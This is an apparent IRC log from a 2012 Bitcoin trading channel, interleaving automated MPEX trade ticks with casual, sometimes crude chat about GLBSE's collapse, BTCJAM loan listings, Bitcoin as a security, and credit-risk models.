8850 @ 0.00052919 = 4.6833 BTC [-] Nov 26 01:12:24 "It is not only GLBSE users that did not file claims or got double payments, some users that filed their claims and did not receive double payments are also not on the lists. " Nov 26 01:12:28 could it get worse ? Nov 26 01:12:30 at this point ? Nov 26 01:12:44 it can ONLY get worse Nov 26 01:12:49 why are you asking? Nov 26 01:13:20 but i mean... how ?! Nov 26 01:13:38 literally, there is no longer any possiblity, no matter how theoretical. all has been used. Nov 26 01:13:46 if you dont know the answer, then you have not been paying attention to Nefario's history. Nov 26 01:13:48 End of Line. Nov 26 01:15:13 Manual of Fail. A Textbook. Nov 26 01:16:39 I keep thinking about it Nov 26 01:17:22 and the only real opton I can come up wiht for doing "funds" non-backed things like rigs, but the passthroughs, etc.. is to just do it Nov 26 01:17:26 and put a giant red flag on the asset Nov 26 01:17:27 warning users Nov 26 01:17:59 I mean, there _are_ some good ppl, with good intentions, who wanna do things like mutual funds Nov 26 01:18:16 Ukto it's how teramining was gonna go. Nov 26 01:18:54 I also dont want a certin someone >,> to go labeling my system as the asset sesspool. :P Nov 26 01:19:05 lol Nov 26 01:19:09 so don't list shit. Nov 26 01:19:12 like "they" did w/ glbse :P Nov 26 01:19:18 well Nov 26 01:19:26 if someone cant explain where the money comes from to pay the divs Nov 26 01:19:29 then it wont go up Nov 26 01:19:36 good principle. Nov 26 01:19:43 none of that "secret business" bs. Nov 26 01:19:43 thats rule #1 no matter what Nov 26 01:19:48 yeah Nov 26 01:19:51 yeah. Nov 26 01:19:55 thats why I didnt get hurt by pi8 Nov 26 01:20:03 or bitcoinica Nov 26 01:20:19 me too. exactly. Nov 26 01:20:19 mother of god, giga's thread is on page 72 ? was 64 yest Nov 26 01:20:26 what exactly do those people have to say ?! Nov 26 01:20:38 lol, to be expeted with the rabbit he pulled out of the hat :P Nov 26 01:21:00 I dont think a single person expected it Nov 26 01:21:13 prolly everyone want to be hero members of btctalk Nov 26 01:22:11 rewarding BS... what could probablo get wrong? Nov 26 01:22:51 i got to "full member" only recently after several months of semi-daily visits Nov 26 01:23:59 [MPEX] [S.MPOE] 8105 @ 0.00053162 = 4.3088 BTC [+] Nov 26 01:24:00 [MPEX] [S.MPOE] 15043 @ 0.00053294 = 8.017 BTC [+] Nov 26 01:26:01 jurov https://bitcointalk.org/index.php?topic=101902.msg1357187#msg1357187 Nov 26 01:29:17 gambling addict "don't loan to me" asks for another loan: https://btcjam.com/listings/682 Nov 26 01:34:58 [MPEX] [S.DICE] 2000 @ 0.00339594 = 6.7919 BTC [+] Nov 26 01:35:03 alright we're here just sittin in the car Nov 26 01:35:11 I want you to show me if you can get far Nov 26 01:38:06 can anyone elighten me what is ciuciu's problem? https://bitcointalk.org/index.php?topic=101902.msg1357221#msg1357221 Nov 26 01:38:12 *enlighten Nov 26 01:41:50 You did this as to show some activity on your site. You forgot to mention that the activity is from you, the owner of the site. Do you think this is OK? Nov 26 01:41:55 omfg omfg Nov 26 01:42:04 welll... basically, some months ago MPOE-PR called him a scammer. Nov 26 01:42:10 and now... he defaulted. Nov 26 01:42:14 pretty much the only problems i know of. Nov 26 01:43:58 "Did Smikles knew about it?" Nov 26 01:53:11 https://bitcointalk.org/index.php?topic=98574.0 Nov 26 01:53:13 that is kinda cool. Nov 26 01:57:17 [MPEX] [S.MPOE] 4230 @ 0.00053294 = 2.2543 BTC [+] Nov 26 01:57:19 [MPEX] [S.MPOE] 2404 @ 0.000533 = 1.2813 BTC [+] Nov 26 01:59:06 poor ciuciu. Nov 26 02:01:22 safe to class it as 'too stupid to warrant further interaction' Nov 26 02:02:10 [MPEX] [S.MPOE] 13746 @ 0.000533 = 7.3266 BTC [+] Nov 26 02:02:12 [MPEX] [S.MPOE] 3704 @ 0.00053317 = 1.9749 BTC [+] Nov 26 02:04:44 [MPEX] [S.MPOE] 13577 @ 0.00053317 = 7.2388 BTC [+] Nov 26 02:04:45 [MPEX] [S.MPOE] 5123 @ 0.00053334 = 2.7323 BTC [+] Nov 26 02:06:01 i can't stop giggling over that accusation Nov 26 02:06:50 i'll prolly put it into btctalk profile "accused of addting activity to mpex charts" Nov 26 02:06:58 *adding Nov 26 02:09:18 i don't think he understands much of what's going on around him. Nov 26 02:09:22 sorta like gumpy. Nov 26 02:12:53 Stopped by Meze Grill today. It was one of my must-visit places during my trip to NY. The food was DELICIOUS! But, I was informed that they don't take Bitcoin any more. "It didn't work out" Anyone have any idea why? Nov 26 02:12:59 yea, i have a fuckin idea why. Nov 26 02:13:08 because btc doesn't work for retail, that'd be why. Nov 26 02:13:24 [MPEX] [S.MPOE] 17825 @ 0.00053334 = 9.5068 BTC [+] Nov 26 02:13:26 [MPEX] [S.MPOE] 465 @ 0.00053342 = 0.248 BTC [+] Nov 26 02:14:46 [MPEX] [S.DICE] 2274 @ 0.00339594 = 7.7224 BTC [+] Nov 26 02:14:47 [MPEX] [S.DICE] 884 @ 0.00339999 = 3.0056 BTC [+] Nov 26 02:18:27 !ticker s.mpoe Nov 26 02:18:29 [MPEX:S.MPOE] 1day: 0.00049912 / 0.00052292 / 0.00053519 (5361144 shares, 2,803.46 BTC), 30day: 0.0004522 / 0.00049707 / 0.00053519 (79565476 shares, 39,550.20 BTC) Nov 26 02:20:01 jurov https://bitcointalk.org/index.php?topic=95826.40 Nov 26 02:20:09 at least he doesn't seem to be targetting you particularly. Nov 26 02:21:47 [MPEX] [S.MPOE] 19700 @ 0.00053342 = 10.5084 BTC [+] Nov 26 02:26:30 [MPEX] [S.MPOE] 5805 @ 0.00053342 = 3.0965 BTC [+] Nov 26 02:26:31 [MPEX] [S.MPOE] 3500 @ 0.00053491 = 1.8722 BTC [+] Nov 26 02:26:33 [MPEX] [S.MPOE] 4709 @ 0.00053519 = 2.5202 BTC [+] Nov 26 02:30:22 [MPEX] [S.MPOE] 14500 @ 0.00053519 = 7.7603 BTC [+] Nov 26 02:38:43 jurov mr. broker Nov 26 02:52:01 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.52001445 = 520.0145 BTC [-] Nov 26 02:52:35 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.43951686 = 439.5169 BTC [-] Nov 26 02:52:56 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.35901927 = 359.0193 BTC [-] Nov 26 02:53:51 ;;ticker Nov 26 02:53:51 BTCUSD ticker | Best bid: 12.49737, Best ask: 12.49738, Bid-ask spread: 0.00001, Last trade: 12.49737, 24 hour volume: 24521.28612267, 24 hour low: 12.31250, 24 hour high: 12.60000, 24 hour vwap: 12.49009 Nov 26 02:55:48 [MPEX] [S.MPOE] 2345 @ 0.00053201 = 1.2476 BTC [-] Nov 26 02:55:50 [MPEX] [S.MPOE] 20500 @ 0.00053184 = 10.9027 BTC [-] Nov 26 02:55:51 [MPEX] [S.MPOE] 3184 @ 0.00053166 = 1.6928 BTC [-] Nov 26 03:01:29 [MPEX] [S.MPOE] 1666 @ 0.00053166 = 0.8857 BTC [-] Nov 26 03:01:30 [MPEX] [S.MPOE] 23134 @ 0.00053095 = 12.283 BTC [-] Nov 26 03:02:17 mr. smickles: Nov 26 03:02:20 http://codinginmysleep.com/block-reward-halving/ Nov 26 03:02:37 what is your vote? Nov 26 03:06:48 [MPEX] [S.MPOE] 7778 @ 0.00053095 = 4.1297 BTC [-] Nov 26 03:09:13 ;;halfreward Nov 26 03:09:13 Estimated time of bitcoin block reward halving: Wed Nov 28 21:49:14 2012 UTC | Time remaining: 2 days, 20 hours, 40 minutes, and 0 seconds. Nov 26 03:11:11 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.52001445 = 520.0145 BTC [-] Nov 26 03:12:43 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.43951686 = 439.5169 BTC [-] Nov 26 03:12:54 basically an value investing vs efficient market theory vote. Nov 26 03:13:32 judging by calls closing i guess there's not going to be much more of a jump. Nov 26 03:13:42 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.35901927 = 359.0193 BTC [-] Nov 26 03:14:00 [MPEX] [S.MPOE] 2345 @ 0.00053504 = 1.2547 BTC [+] Nov 26 03:14:03 [MPEX] [S.MPOE] 14760 @ 0.00053519 = 7.8994 BTC [+] Nov 26 03:14:04 [MPEX] [S.MPOE] 5495 @ 0.00053525 = 2.9412 BTC [+] Nov 26 03:16:12 [MPEX] [S.MPOE] 6454 @ 0.00053525 = 3.4545 BTC [+] Nov 26 03:16:14 [MPEX] [S.MPOE] 6146 @ 0.00053526 = 3.2897 BTC [+] Nov 26 03:22:15 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.52001445 = 520.0145 BTC [-] Nov 26 03:22:42 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.43951686 = 439.5169 BTC [-] Nov 26 03:23:16 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.35901927 = 359.0193 BTC [-] Nov 26 03:24:14 [MPEX] [S.MPOE] 4700 @ 0.00053526 = 2.5157 BTC [+] Nov 26 03:29:17 [MPEX] [S.MPOE] 2345 @ 0.00053104 = 1.2453 BTC [-] Nov 26 03:29:18 [MPEX] [S.MPOE] 6484 @ 0.00053095 = 3.4427 BTC [-] Nov 26 03:34:16 ;bc,blocks Nov 26 03:34:20 ;;bc,blocks Nov 26 03:34:20 209592 Nov 26 03:56:55 [MPEX] [S.MPOE] 6604 @ 0.00053095 = 3.5064 BTC [-] Nov 26 03:56:56 [MPEX] [S.MPOE] 1396 @ 0.00053093 = 0.7412 BTC [-] Nov 26 03:59:43 [MPEX] [S.MPOE] 2345 @ 0.00053136 = 1.246 BTC [+] Nov 26 03:59:45 [MPEX] [S.MPOE] 5452 @ 0.00053144 = 2.8974 BTC [+] Nov 26 04:03:44 [MPEX] [S.MPOE] 9278 @ 0.00053144 = 4.9307 BTC [+] Nov 26 04:03:46 [MPEX] [S.MPOE] 15350 @ 0.0005315 = 8.1585 BTC [+] Nov 26 04:03:47 [MPEX] [S.MPOE] 1000 @ 0.00053525 = 0.5353 BTC [+] Nov 26 04:03:48 [MPEX] [S.MPOE] 28760 @ 0.00053526 = 15.3941 BTC [+] Nov 26 04:17:17 [MPEX] [S.MPOE] 2345 @ 0.00053103 = 1.2453 BTC [-] Nov 26 04:17:19 [MPEX] [S.MPOE] 7305 @ 0.00053093 = 3.8784 BTC [-] Nov 26 04:20:39 lol, that sudoghost guy didn't see the connection between a e-currency modeled on the idea of Libertarian economist and Bitcoin Nov 26 04:20:45 for serious Nov 26 04:21:23 [MPEX] [S.MPOE] 3831 @ 0.00053093 = 2.034 BTC [-] Nov 26 04:21:25 [MPEX] [S.MPOE] 5569 @ 0.00053045 = 2.9541 BTC [-] Nov 26 04:25:03 [MPEX] [S.MPOE] 13281 @ 0.00053045 = 7.0449 BTC [-] Nov 26 04:25:04 [MPEX] [S.MPOE] 8119 @ 0.00053027 = 4.3053 BTC [-] Nov 26 04:34:07 [MPEX] [S.MPOE] 19831 @ 0.00053027 = 10.5158 BTC [-] Nov 26 04:34:08 [MPEX] [S.MPOE] 2769 @ 0.00053026 = 1.4683 BTC [-] Nov 26 04:40:30 [MPEX] [S.MPOE] 2345 @ 0.00053214 = 1.2479 BTC [+] Nov 26 04:40:31 [MPEX] [S.MPOE] 1000 @ 0.00053226 = 0.5323 BTC [+] Nov 26 04:40:33 [MPEX] [S.MPOE] 8205 @ 0.00053227 = 4.3673 BTC [+] Nov 26 04:43:53 [MPEX] [S.DICE] 3500 @ 0.00339999 = 11.9 BTC [+] Nov 26 04:45:31 [MPEX] [S.MPOE] 5795 @ 0.00053227 = 3.0845 BTC [+] Nov 26 04:45:33 [MPEX] [S.MPOE] 21855 @ 0.00053465 = 11.6848 BTC [+] Nov 26 04:50:51 -otc is strange Nov 26 04:51:16 agreed Nov 26 04:51:35 [MPEX] [S.MPOE] 9795 @ 0.00053465 = 5.2369 BTC [+] Nov 26 04:51:36 [MPEX] [S.MPOE] 22905 @ 0.00053526 = 12.2601 BTC [+] Nov 26 04:51:48 20% scam, 80% retard Nov 26 04:57:01 i got a btc paying job Nov 26 04:57:03 https://bitcointalk.org/index.php?topic=49971.msg1357503#msg1357503 Nov 26 04:58:45 kakobrekla i made 4 btc off teh fish today Nov 26 04:58:56 goddamn. Nov 26 04:58:58 dub it jumped the shark back in april. Nov 26 04:59:04 kakobrekla but im done with it so. Nov 26 04:59:41 o hey, so you're now kakobrekla-pr ? wd. Nov 26 05:00:09 kakobrekla: nice Nov 26 05:00:34 paid btc to hand out on IRC, tough gig Nov 26 05:00:40 :D Nov 26 05:00:41 s/hand/hang Nov 26 05:01:48 coingenuity https://bitcointalk.org/index.php?topic=127763 Nov 26 05:02:03 dub see, you're missing out Nov 26 05:07:37 I don't follow Nov 26 05:08:23 how come you're not being paid to hang out Nov 26 05:10:02 I've had some rather arduous irc jobs before, never got paid though Nov 26 05:11:11 nutjobs you mean ? Nov 26 05:14:46 [MPEX] [S.MPOE] 4089 @ 0.00053526 = 2.1887 BTC [+] Nov 26 05:14:47 [MPEX] [S.MPOE] 5611 @ 0.00053575 = 3.0061 BTC [+] Nov 26 05:16:14 herding nutjobs was one Nov 26 05:23:25 [MPEX] [S.MPOE] 2345 @ 0.00053037 = 1.2437 BTC [-] Nov 26 05:23:27 [MPEX] [S.MPOE] 21167 @ 0.00053026 = 11.224 BTC [-] Nov 26 05:23:31 [MPEX] [S.MPOE] 2649 @ 0.00052956 = 1.4028 BTC [-] Nov 26 05:24:37 [MPEX] [S.MPOE] 5000 @ 0.00052956 = 2.6478 BTC [-] Nov 26 05:28:22 mircea_popescu: aye, some specific items are delayed due to the hurricane in the USA Nov 26 05:28:28 we've let those customers know via email Nov 26 05:28:35 a ok. just thought you'd want to know. Nov 26 05:28:58 ya, thanks, let my staff know to speak to him Nov 26 05:29:29 certain manufacturers are based in the manhatten area, they got hit REALLY hard in the hurricane Nov 26 05:29:45 so there's a bit of a delay on specific items, but we're letting folks know as needed Nov 26 05:30:36 as they fix the situation there with roads and electricity etc the delay will vanish pretty rapidly, but nothing we can do about freaksize hurricanes... yet! Nov 26 05:31:47 still not fully restored power in manhattan have they ? Nov 26 05:50:02 BAM! Nov 26 05:50:05 I say BAM! Nov 26 05:50:08 Macintosh was discussing Friedrich Hayek's model, not Bitcoins, and is a 14 year old document, discussing something 10 years before Bitcoin was introduced. I'm not following the correlation between Hayek's model possibly not being considered a security and Bitcoin, a different concept entirely. - SudoGhost 01:39, 26 November 2012 (UTC) Nov 26 05:50:13 You don't see the connection between a Libertarian who advocated free experiment in methods of transmitting value and Bitcoin? Nov 26 05:50:16 Did I miss something, I thought the relevant footnote was about an digital currency and Ginburg brought it up as reference for digital currencies being unlikely to be regulated as securities in a discussion about Bitcoin being a security or not which directly impacts whether or not Bitcoin is a Ponzi scheme. --Smickles86 (talk) 02:13, 26 November 2012 (UTC) Nov 26 05:50:21 Also, if you still see it hard to see, why don't we use the very next two sentences in the Grinberg text: "Bitcoin supporters may similarly argue, as elaborated below, that bitcoins do not look like securities or investments, especially because there is no money- making enterprise that is attempting to raise money, and that bitcoins are instead like commodities or currencies, which are generally not regulated under the federal securities laws. Fu Nov 26 05:52:55 [MPEX] [S.MPOE] 2345 @ 0.00053071 = 1.2445 BTC [+] Nov 26 05:52:57 [MPEX] [S.MPOE] 9543 @ 0.00053092 = 5.0666 BTC [+] Nov 26 05:53:48 [MPEX] [S.MPOE] 2345 @ 0.00052966 = 1.2421 BTC [-] Nov 26 05:53:50 [MPEX] [S.MPOE] 10305 @ 0.00052956 = 5.4571 BTC [-] Nov 26 05:54:05 lol smickles Nov 26 05:55:07 it was a little exciting Nov 26 05:56:09 ya know, that one guy not seeing the connection between digital currency based on austrian economics and Bitcoin Nov 26 05:56:19 a person that has not the experience of a good beating Nov 26 05:56:25 [MPEX] [S.MPOE] 2345 @ 0.00053084 = 1.2448 BTC [+] Nov 26 05:56:27 [MPEX] [S.MPOE] 8957 @ 0.00053092 = 4.7555 BTC [+] Nov 26 05:56:28 [MPEX] [S.MPOE] 1748 @ 0.0005321 = 0.9301 BTC [+] Nov 26 05:56:36 has not the incentive and thus not the ability to back down when they've been proven wrong. Nov 26 05:57:09 heh, I consider him moving the goalposts so many times to be backing down Nov 26 05:58:28 i considered him an idiot since about a week ago, or was it two. Nov 26 05:58:45 since the first week of November , iirc Nov 26 05:59:07 time flies Nov 26 06:00:48 [MPEX] [S.MPOE] 7252 @ 0.0005321 = 3.8588 BTC [+] Nov 26 06:00:50 [MPEX] [S.MPOE] 19789 @ 0.00053575 = 10.602 BTC [+] Nov 26 06:00:51 [MPEX] [S.MPOE] 1000 @ 0.00053585 = 0.5359 BTC [+] Nov 26 06:00:52 [MPEX] [S.MPOE] 4209 @ 0.00053586 = 2.2554 BTC [+] Nov 26 06:05:08 [MPEX] [S.DICE] 2960 @ 0.00339999 = 10.064 BTC [+] Nov 26 06:09:35 [MPEX] [S.MPOE] 2345 @ 0.00052986 = 1.2425 BTC [-] Nov 26 06:09:37 [MPEX] [S.MPOE] 1155 @ 0.00052956 = 0.6116 BTC [-] Nov 26 06:13:16 Accuracy Nov 26 06:13:16 The Merton model has been shown to be empirically accurate for non-financial firms, especially manufacturing entities. The highly leveraged nature of financial firms produces CDS spreads which are significantly higher than observed in the market due to the asset diffusion process. Nov 26 06:13:32 they imply that the spreads observed in the market are correct Nov 26 06:13:52 this is of course not the case : financials are overbought by degrees of fucking magnitude in the past decade+ Nov 26 06:15:49 'degrees of fucking magnitude' Nov 26 06:16:02 [MPEX] [S.MPOE] 2345 @ 0.00053553 = 1.2558 BTC [+] Nov 26 06:16:03 [MPEX] [S.MPOE] 8155 @ 0.00053586 = 4.3699 BTC [+] Nov 26 06:18:16 yeah. Nov 26 06:19:17 sorta like miner bonds in btc. on the strength of their revenue generating abilities, us investment banks for instance are 100 to 1000x oversized, all through the 90s and 00s Nov 26 06:19:56 just like on the strength of their revenue generating abilities, miner bonds shouldn't really have seen investment over the 100 btc mark for the entire slate. Nov 26 06:23:54 I feel like these models would benifit from being based on lognormal curves rather than gausian ones Nov 26 06:24:07 but i don't have the time to work on that math Nov 26 06:25:14 smickles it's not based on either. Nov 26 06:25:50 merton is basically "let's consider holding a company as the equivalent of holding an european style call on its assets" Nov 26 06:27:12 has some diffusion and a stochastic minlevel thing. Nov 26 06:28:20 a Gaussian process is a stochastic process Nov 26 06:28:28 The barrier itself is stochastic, Nov 26 06:28:38 :P Nov 26 06:28:53 i may have had it backwards a little Nov 26 06:31:14 anyway, im not so sure moving from gauss to galton will necessarily benefit anything. Nov 26 06:32:57 heh, i'm not sure either, but the longer tails feel better to me when i consider that LTCM got hit by a 'tail event' which may have been covered if their formula wasn't gaussian Nov 26 06:33:25 of course, they did some other stupid shit too... but even so Nov 26 06:33:54 [MPEX] [S.MPOE] 2345 @ 0.0005299 = 1.2426 BTC [-] Nov 26 06:33:56 [MPEX] [S.MPOE] 17809 @ 0.00052956 = 9.4309 BTC [-] Nov 26 06:33:57 [MPEX] [S.MPOE] 3546 @ 0.0005293 = 1.8769 BTC [-] Nov 26 06:34:27 no, that's my point : they lied. Nov 26 06:34:45 to get any benefit from the fins discussion of statistics we'd have to have solved all the other problems Nov 26 06:39:53 LCTM is actually a fine example. the idea of arbitraging off-run bonds is probably workable, if you keep expenses low. Nov 26 06:40:10 then they suddenly saw 1bn+ in capital and well... there just wasn't room to spend that much in their intended market Nov 26 06:40:21 so they just... fucked it up instead. Nov 26 06:43:11 [MPEX] [S.MPOE] 3901 @ 0.0005293 = 2.0648 BTC [-] Nov 26 06:47:38 http://securityaffairs.co/wordpress/10404/security/bitcoin-the-new-paradise-for-money-laundering.html lulzy Nov 26 06:48:30 [MPEX] [S.MPOE] 2345 @ 0.00053439 = 1.2531 BTC [+] Nov 26 06:48:30 [MPEX] [S.MPOE] 8505 @ 0.00053463 = 4.547 BTC [+] Nov 26 06:50:24 [MPEX] [S.DICE] 4300 @ 0.00339999 = 14.62 BTC [+] Nov 26 06:50:40 dub: I usually stop reading when the english is this badly written. Nov 26 06:51:19 wait. Nov 26 06:51:22 maybe its ciuciu Nov 26 06:51:27 anyone else see the funny in "security affairs" Nov 26 06:51:35 what with the recent head of the cia scandal ? Nov 26 06:52:16 The lack of control on the financial flows to and from the cyberspace makes recycling operations through a virtual currency extremely efficient and very difficult to prevent, it must be also considered the absence of a regulation to approach the cyber laundering phenomena. Nov 26 06:56:01 [MPEX] [S.MPOE] 2345 @ 0.00052961 = 1.2419 BTC [-] Nov 26 06:56:02 [MPEX] [S.MPOE] 185 @ 0.0005293 = 0.0979 BTC [-] Nov 26 06:56:03 [MPEX] [S.MPOE] 7846 @ 0.00052878 = 4.1488 BTC [-] Nov 26 06:57:53 how about they just suck my cock. Nov 26 06:58:18 this attitude as if "control" is something that's feasible, possible, desirable or even allowable is getting on my nerves. Nov 26 06:58:42 [MPEX] [S.MPOE] 2345 @ 0.00053461 = 1.2537 BTC [+] Nov 26 06:58:43 [MPEX] [S.MPOE] 12155 @ 0.00053463 = 6.4984 BTC [+] Nov 26 07:01:33 [MPEX] [S.DICE] 3727 @ 0.00338876 = 12.6299 BTC [-] Nov 26 07:01:35 [MPEX] [S.DICE] 573 @ 0.00338509 = 1.9397 BTC [-] Nov 26 07:11:42 [MPEX] [S.MPOE] 14050 @ 0.00053463 = 7.5116 BTC [+] Nov 26 07:16:22 http://trilema.com/2012/the-problem-of-too-much-money/ Nov 26 07:16:23 here! Nov 26 07:24:41 [MPEX] [S.MPOE] 2345 @ 0.00052913 = 1.2408 BTC [-] Nov 26 07:24:43 [MPEX] [S.MPOE] 5555 @ 0.00052878 = 2.9374 BTC [-] Nov 26 07:33:24 [MPEX] [S.MPOE] 14614 @ 0.00052884 = 7.7285 BTC [+] Nov 26 07:33:26 [MPEX] [S.MPOE] 26436 @ 0.00053463 = 14.1335 BTC [+] Nov 26 07:39:51 [MPEX] [S.MPOE] 13850 @ 0.00053123 = 7.3575 BTC [-] Nov 26 07:39:52 [MPEX] [S.MPOE] 5649 @ 0.00052878 = 2.9871 BTC [-] Nov 26 07:39:54 [MPEX] [S.MPOE] 401 @ 0.00052871 = 0.212 BTC [-] Nov 26 07:42:31 [MPEX] [S.MPOE] 2345 @ 0.00053444 = 1.2533 BTC [+] Nov 26 07:42:32 [MPEX] [S.MPOE] 11286 @ 0.00053463 = 6.0338 BTC [+] Nov 26 07:42:33 [MPEX] [S.MPOE] 2169 @ 0.00053561 = 1.1617 BTC [+] Nov 26 07:42:38 mircea, what's that thing at the bottom: UPCOMING - K.KBRL - Pending, due klim. Nov 26 07:46:17 [MPEX] [S.MPOE] 2345 @ 0.00052872 = 1.2398 BTC [-] Nov 26 07:46:18 [MPEX] [S.MPOE] 2399 @ 0.00052871 = 1.2684 BTC [-] Nov 26 07:46:19 [MPEX] [S.MPOE] 9806 @ 0.00052855 = 5.183 BTC [-] Nov 26 07:47:34 just a little inside jok Nov 26 07:47:36 e Nov 26 07:56:05 eh Nov 26 07:56:25 mircea: I enjoy your entertaining blog, so I'll leave you one little tip I often mention to non-native writers of English: the correct key for an apostrophe (used in possessives and contractions) is this one: ' not this one: ` Nov 26 07:57:36 and i do use ' Nov 26 07:57:47 don't i? Nov 26 07:58:25 it's probably your keyboard's fault Nov 26 07:58:33 my keyboard is and always was us ? Nov 26 07:58:38 course, i see wp renders it as ’ Nov 26 07:58:59 or do you mean specifically numbers, such as 20`000 ? Nov 26 07:59:26 you sure you're using a U.S. keyboard? Nov 26 07:59:31 yep Nov 26 07:59:45 or maybe your OS it set up with some other weird key mapping Nov 26 07:59:46 i can't stnad localised kbds. never used anything but us101 Nov 26 07:59:52 it happens all the time Nov 26 07:59:58 mnope, my os is also us Nov 26 08:00:15 do you see ' and ' different on your terminal ? Nov 26 08:00:20 weird .. well the apostrophes that come out on your blog are definitely wrong Nov 26 08:00:27 no, here those look the same to me Nov 26 08:00:36 ok, quote me a sentence off the blog ? Nov 26 08:00:56 I only have ' and ` I don't have ’ Nov 26 08:01:09 on your kbd you mean pigeons ? Nov 26 08:01:13 yeah Nov 26 08:01:23 me too. but for some reason wp decided " is to be curlified Nov 26 08:01:25 and same for ' Nov 26 08:01:28 hmm…ya, when I paste it here it looks right Nov 26 08:01:41 well then maybe... YOUR terminal has some localisation weirdness ? Nov 26 08:01:41 maybe it's just the font or the way the blog is rendering it .. weird Nov 26 08:02:01 [MPEX] [S.DICE] 2250 @ 0.00339999 = 7.65 BTC [+] Nov 26 08:02:07 well I mentioned it because I only noticed it on your blog Nov 26 08:02:26 and I see the same thing all the time around here from non-English writers around here Nov 26 08:02:28 you're the first one to have mentioned it, so i guess we got something here. Nov 26 08:03:18 just so happens i'm millitant against dumbass special chars. wrote romanian for years w/o any of their little squigly shits Nov 26 08:03:22 much to everyone's chagrin Nov 26 08:03:42 ya, i'm sure romanian is a lot worse Nov 26 08:04:10 îţâşă Nov 26 08:04:20 there's a word dedicated to it. Nov 26 08:06:14 [MPEX] [S.MPOE] 21313 @ 0.00052855 = 11.265 BTC [-] Nov 26 08:06:16 [MPEX] [S.MPOE] 533 @ 0.00052821 = 0.2815 BTC [-] Nov 26 08:09:00 [MPEX] [S.MPOE] 16055 @ 0.00052821 = 8.4804 BTC [-] Nov 26 08:09:02 [MPEX] [S.MPOE] 1395 @ 0.00052819 = 0.7368 BTC [-] Nov 26 08:09:55 http://www.jeg.ro/wp-content/uploads/2012/10/obama-biscuits.jpg Nov 26 08:15:24 Dafuq? Nov 26 08:18:50 is there a new url format for fishgame my old code no work Nov 26 08:23:03 [MPEX] [S.MPOE] 2345 @ 0.00053381 = 1.2518 BTC [+] Nov 26 08:23:05 [MPEX] [S.MPOE] 11749 @ 0.00053407 = 6.2748 BTC [+] Nov 26 08:23:46 https://btcjam.com/listings/671 Nov 26 08:38:27 [MPEX] [S.MPOE] 2345 @ 0.0005285 = 1.2393 BTC [-] Nov 26 08:38:28 [MPEX] [S.MPOE] 10955 @ 0.00052819 = 5.7863 BTC [-] Nov 26 08:39:44 [MPEX] [S.MPOE] 8450 @ 0.00052819 = 4.4632 BTC [-] Nov 26 08:39:45 [MPEX] [S.MPOE] 2450 @ 0.00052764 = 1.2927 BTC [-] Nov 26 08:47:16 pigeons Amount @ Rate BTC 10000.00000 @ 1.0% Nov 26 08:47:18 cute. Nov 26 08:48:14 yes, the rate displayed on that site is a monthly rate, but still Nov 26 08:48:29 0 Active , 0 Repaid Nov 26 08:48:31 lot of coins to come out of nowhere and ask for Nov 26 08:48:50 basically, the people with too much btc have to have a way to get rid of the burden Nov 26 08:49:16 this looks like a helpful way to accomplish that Nov 26 08:49:48 This WOT is so complicated! I'm a usual game developer. I'm not able to get how to Nov 26 08:49:48 register there and I've never used GPG or something like that. :) Nov 26 08:49:48 Thanks for your offer though. Nov 26 08:49:50 teh suck. Nov 26 08:50:24 is that from the forum? Nov 26 08:51:23 [MPEX] [S.DICE] 7105 @ 0.00339999 = 24.1569 BTC [+] Nov 26 08:51:24 not even. Nov 26 08:52:38 so danieldaniel can figure out how to read the guide and register, but this guy is a "developer" Nov 26 08:53:55 here you go, 50% per month https://btcjam.com/listings/663 Nov 26 08:54:16 Need for site program Nov 26 08:54:24 0 Active , 0 Repaid Nov 26 08:54:56 basically... all these people making sites on the theory that bitcoin is the new hip social media and the userbase will sort it out itself need to go away Nov 26 08:55:10 preferably back to wow or whatever the fuck they were doing. Nov 26 08:55:32 "I need this so I can pay my hosting and other things. I have very good credit and can furnish." pff Nov 26 09:04:39 [MPEX] [S.MPOE] 2345 @ 0.00053372 = 1.2516 BTC [+] Nov 26 09:04:41 [MPEX] [S.MPOE] 14705 @ 0.00053407 = 7.8535 BTC [+] Nov 26 09:05:48 [MPEX] [O.BTCUSD.C120T] 5 @ 0.06577646 = 0.3289 BTC [-] Nov 26 09:08:36 [MPEX] [O.BTCUSD.C120T] 2 @ 0.06577646 = 0.1316 BTC [-] Nov 26 09:08:52 i guess i could just say, haha look at all the btcjam listings, but i will do you the service of filtering: https://btcjam.com/listings/691 Nov 26 09:08:54 [MPEX] [O.BTCUSD.C130T] 1 @ 0.03353922 BTC [-] Nov 26 09:10:21 freemoney is borrowing 2btc ?! Nov 26 09:14:21 i doubt that is the same freemoney Nov 26 09:14:48 i guess name squatting is the next big scam. Nov 26 09:15:18 [MPEX] [S.MPOE] 2345 @ 0.00053211 = 1.2478 BTC [-] Nov 26 09:15:20 [MPEX] [S.MPOE] 12376 @ 0.00053193 = 6.5832 BTC [-] Nov 26 09:15:21 [MPEX] [S.MPOE] 9119 @ 0.00052764 = 4.8115 BTC [-] Nov 26 09:17:37 i'm going through btcjam and leaving comments since there's nothing on tv Nov 26 09:18:13 [MPEX] [S.DICE] 2352 @ 0.00338509 = 7.9617 BTC [-] Nov 26 09:19:21 why are you going to borrow at 7%/month to pay your cell phone bill that's in collections and stopped accruing interest? Nov 26 09:19:23 [MPEX] [S.MPOE] 2345 @ 0.00053402 = 1.2523 BTC [+] Nov 26 09:19:25 [MPEX] [S.MPOE] 9446 @ 0.00053407 = 5.0448 BTC [+] Nov 26 09:19:26 [MPEX] [S.MPOE] 11417 @ 0.00053481 = 6.1059 BTC [+] Nov 26 09:20:01 and the BTC could go up in value vs the USD his bill is in Nov 26 09:21:17 did the person actually say that's what the btc is for ?! Nov 26 09:22:37 yes Nov 26 09:22:54 ask them to join the wot. Nov 26 09:23:53 oh ok actually they give a reason (can't get grad school loan with that collection on report) https://btcjam.com/listings/646 Nov 26 09:24:21 can't be a scam either, they have a verified facebook page! Nov 26 09:24:30 right... Nov 26 09:25:25 Aww... I'm sad without GLBSE... no crazy sellers/buyers for fast 100%+ profit flips. Nov 26 09:26:14 grad school loan ? Nov 26 09:26:25 [MPEX] [S.MPOE] 2183 @ 0.00053481 = 1.1675 BTC [+] Nov 26 